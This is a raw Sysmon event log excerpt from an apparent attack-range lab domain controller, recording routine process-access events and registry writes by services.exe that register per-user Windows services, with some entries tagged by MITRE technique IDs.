l+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72F40DE5A411D60B31E88A5F639AF2AF,SHA256=320B8620AE2FC84E14552A165D6DAA97116D0F0A8DF4D854450B7BDAE4FAAEBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.120{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.120{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.120{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.120{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1dc37|C:\Windows\system32\services.exe+17f38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 13241300x80000000000000004487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\Description@%%SystemRoot%%\system32\WpnUserService.dll,-2 13241300x80000000000000004486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\FailureActionsBinary Data 13241300x80000000000000004485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\Security\SecurityBinary Data 13241300x80000000000000004484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\DisplayNameWindows Push Notifications User Service_b6adb 13241300x80000000000000004483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\StartDWORD (0x00000003) 13241300x80000000000000004480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.120{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-14000 13241300x80000000000000004478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\Security\SecurityBinary Data 13241300x80000000000000004476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\DisplayNameUser Data Access_b6adb 13241300x80000000000000004475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\StartDWORD (0x00000003) 13241300x80000000000000004472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-10002 13241300x80000000000000004470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\Security\SecurityBinary Data 10341000x80000000000000004468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\DisplayNameUser Data Storage_b6adb 13241300x80000000000000004464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\ImagePathC:\Windows\System32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\StartDWORD (0x00000003) 13241300x80000000000000004461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-15000 13241300x80000000000000004459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\Security\SecurityBinary Data 13241300x80000000000000004457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\DisplayNameContact Data_b6adb 13241300x80000000000000004456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\StartDWORD (0x00000003) 13241300x80000000000000004453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\Description@%%SystemRoot%%\system32\APHostRes.dll,-10001 13241300x80000000000000004451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\Security\SecurityBinary Data 13241300x80000000000000004449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\DisplayNameSync Host_b6adb 10341000x80000000000000004448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 